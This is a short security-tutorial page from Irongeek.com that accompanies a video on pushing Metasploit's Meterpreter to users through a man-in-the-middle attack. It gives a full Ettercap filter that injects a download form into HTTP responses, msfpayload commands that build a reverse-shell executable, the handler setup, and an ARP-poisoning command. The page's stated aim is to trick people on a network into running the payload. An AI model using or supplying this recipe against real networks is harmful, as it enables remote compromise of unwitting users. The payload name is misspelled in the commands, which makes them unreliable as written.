Deploying Metasploit's Meterpreter with MITM and an Ettercap filter (Hacking Illustrated Series InfoSec Tutorial Videos)

Feel free to include my content in your page via my
RSS feed Follow @irongeek_adc

Help Irongeek.com pay for
bandwidth and research equipment:
Subscribestar or Patreon

Search Irongeek.com:

Affiliates:

Help Irongeek.com pay for bandwidth and research equipment:

Deploying Metasploit's Meterpreter with MITM and an Ettercap filter (Hacking Illustrated Series InfoSec Tutorial Videos)

Deploying Metasploit's Meterpreter with MITM and an Ettercap filter

In this video, Bigmac shows how to redirect web traffic and trick users into downloading Meterpreter and running it on their box.

ettercap filter html injection. meterpreter payload from bigmac on Vimeo.

save this as html.filter

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
           replace("Accept-Encoding", "Accept-Nothing!");
      }
}

if (ip.proto == TCP && tcp.src == 80) {
      if (search(DATA.data, "<title>")) {
           replace("</title>", "</title><form
 action="http://192.168.1.6/meterpeter.exe" method="link"><img src="http://192.168.1.6/alert.gif"><INPUT TYPE=submit value="DOWNLOAD meterpeter.exe"></form><html><body><h10>just some instructions</h10></body></html>");
           msg("html injected");
      }}

-create the meterpeter.exe-
(open msfconsole)
../msfpayload windows/meterpeter/reverse_tcp LHOST=192.168.1.6 LPORT=100 x > meterpeter.exe
Now place the executable into your Apache root directory

-set up your listener-
use exploit/multi/handler
set PAYLOAD windows/meterpeter/reverse_tcp
set LHOST 192.168.1.6
set LPORT 100

-execute ettercap-
etterfilter html.filter -o html.ef
ettercap -T -q -F html.ef -M ARP // //

now wait for some one on the network to download and execute meterpeter.exe and you will have a reverse shell

15 most recent posts on Irongeek.com:

If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.